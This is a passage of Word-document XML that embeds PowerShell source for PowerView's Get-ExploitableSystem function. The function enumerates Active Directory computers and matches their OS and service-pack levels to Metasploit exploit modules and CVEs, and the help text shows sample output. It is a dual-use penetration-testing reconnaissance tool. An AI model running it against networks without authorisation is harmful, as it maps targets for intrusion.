      </w:r>
    </w:p>
    <w:p w14:paraId="3F050BE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3FA6BB64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6FCBAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2DE5E90B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682A1732" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C8CEF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7FB82ECB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E81EE0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF55E66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The example below shows the standard command usage.  Disabled system are excluded by default, but</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263365E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        the "LastLgon" column can be used to determine which systems are live.  Usually, if a system hasn't </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD8B8F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        logged on for two or more weeks it's been decommissioned.      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413CAD1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-ExploitableSystem -DomainController 192.168.1.1 -Credential demo.com\user | Format-Table -AutoSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC9A253" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [*] Grabbing computer accounts from Active Directory...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056528DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [*] Loading exploit list for critical missing patches...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DD708B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [*] Checking computers for vulnerable OS and SP levels...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E333833" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [+] Found 5 potentially vulnerable systems!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFFBCBD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        ComputerName          OperatingSystem         ServicePack    LastLogon            MsfModule                                      CVE                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F8920D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        ------------          ---------------         -----------    ---------            ---------                                      ---                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7907CC12" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        ADS.demo.com          Windows Server 2003     Service Pack 2 4/8/2015 5:46:52 PM  exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2CB617" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        ADS.demo.com          Windows Server 2003     Service Pack 2 4/8/2015 5:46:52 PM  exploit/windows/smb/ms08_067_netapi            http://www.cvedetails....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D526B65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        ADS.demo.com          Windows Server 2003     Service Pack 2 4/8/2015 5:46:52 PM  exploit/windows/smb/ms10_061_spoolss           http://www.cvedetails....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEECFC5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        LVA.demo.com          Windows Server 2003     Service Pack 2 4/8/2015 1:44:46 PM  exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA57661" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        LVA.demo.com          Windows Server 2003     Service Pack 2 4/8/2015 1:44:46 PM  exploit/windows/smb/ms08_067_netapi            http://www.cvedetails....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBB61D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        LVA.demo.com          Windows Server 2003     Service Pack 2 4/8/2015 1:44:46 PM  exploit/windows/smb/ms10_061_spoolss           http://www.cvedetails....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A4956C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        assess-xppro.demo.com Windows XP Professional Service Pack 3 4/1/2014 11:11:54 AM exploit/windows/smb/ms08_067_netapi            http://www.cvedetails....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F052BE0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        assess-xppro.demo.com Windows XP Professional Service Pack 3 4/1/2014 11:11:54 AM exploit/windows/smb/ms10_061_spoolss           http://www.cvedetails....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5470E978" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        HVA.demo.com          Windows Server 2003     Service Pack 2 11/5/2013 9:16:31 PM exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB98A2C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        HVA.demo.com          Windows Server 2003     Service Pack 2 11/5/2013 9:16:31 PM exploit/windows/smb/ms08_067_netapi            http://www.cvedetails....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF66AD7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        HVA.demo.com          Windows Server 2003     Service Pack 2 11/5/2013 9:16:31 PM exploit/windows/smb/ms10_061_spoolss           http://www.cvedetails....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6D7E11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        DB1.demo.com          Windows Server 2003     Service Pack 2 3/22/2012 5:05:34 PM exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458A2259" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        DB1.demo.com          Windows Server 2003     Service Pack 2 3/22/2012 5:05:34 PM exploit/windows/smb/ms08_067_netapi            http://www.cvedetails....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5497CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        DB1.demo.com          Windows Server 2003     Service Pack 2 3/22/2012 5:05:34 PM exploit/windows/smb/ms10_061_spoolss           http://www.cvedetails....                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B50B41E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="721ACD85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094B535E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29C9EDEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-ExploitableSystem | Export-Csv c:\temp\output.csv -NoTypeInformation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B98074" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6181B66F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        How to write the output to a csv file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4840A76D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7363D809" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5863D07F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="08428277" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-ExploitableSystem -Domain testlab.local -Ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A93B90A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="102E9C1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return a set of live hosts from the testlab.local domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6727B22A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="78EAE6D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">     .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A6FAC1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEEBBEB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">       http://www.netspi.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ABFF3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">       https://github.com/nullbind/Powershellery/blob/master/Stable-ish/ADS/Get-ExploitableSystems.psm1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6B8AF9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BF34B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">     .NOTES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36555A05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036B44FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">       Author:  Scott Sutherland - 2015, NetSPI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45426937" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Modifications to integrate into PowerView by @harmj0y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCB2B83" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">       Version: Get-ExploitableSystem.psm1 v1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505113D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">       Comments: The technique used to query LDAP was based on the "Get-AuditDSComputerAccount" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5172CB03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">       function found in Carols Perez's PoshSec-Mod project.  The general idea is based off of  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE31CDD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">       Will Schroeder's "Invoke-FindVulnSystems" function from the PowerView toolkit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D71DE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A31C07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49773513" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3BEF64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5BD931" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A83566" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1542A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName = '*',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A9D34A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="451B70B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C03931" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SPN,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115EF601" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="031038BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205D833A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $OperatingSystem = '*',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E801660" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="52E7243C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0865F6F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ServicePack = '*',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABFAA5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35F75C58" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9E7C66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Filter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74174C7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3CDE45EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362D924E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Ping,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5281D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="314B13B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283FC5FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319B86CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="368F4508" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31582697" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCD2ACD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="62EFB9EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BD0042" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABFB62C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="57BC99CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7964B21F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Unconstrained,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27124400" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="02C78DD8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9942C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA3A5AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47180FCD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="01231487" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D7257B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC5C07F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76767AC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A516921" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Write-Verbose "[*] Grabbing computer accounts from Active Directory..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603AF76B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5132BB4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    # Create data table for hostnames, os, and service packs from LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22488DB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $TableAdsComputers = New-Object System.Data.DataTable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54712195" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableAdsComputers.Columns.Add('Hostname')       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13224040" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableAdsComputers.Columns.Add('OperatingSystem')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2407990A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableAdsComputers.Columns.Add('ServicePack')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5286DA8A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableAdsComputers.Columns.Add('LastLogon')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7ACC08" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="73F217F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Get-NetComputer -FullData @PSBoundParameters | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298E1607" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4AEFE67B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $CurrentHost = $_.dnshostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7069D1A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $CurrentOs = $_.operatingsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269CCCC2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $CurrentSp = $_.operatingsystemservicepack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68680744" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $CurrentLast = $_.lastlogon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EB9EE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $CurrentUac = $_.useraccountcontrol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3C1700" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1F4B4A6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $CurrentUacBin = [convert]::ToString($_.useraccountcontrol,2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2672C889" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C83E532" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Check the 2nd to last value to determine if its disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFC7633" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DisableOffset = $CurrentUacBin.Length - 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124F3D80" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $CurrentDisabled = $CurrentUacBin.Substring($DisableOffset,1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F7091B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
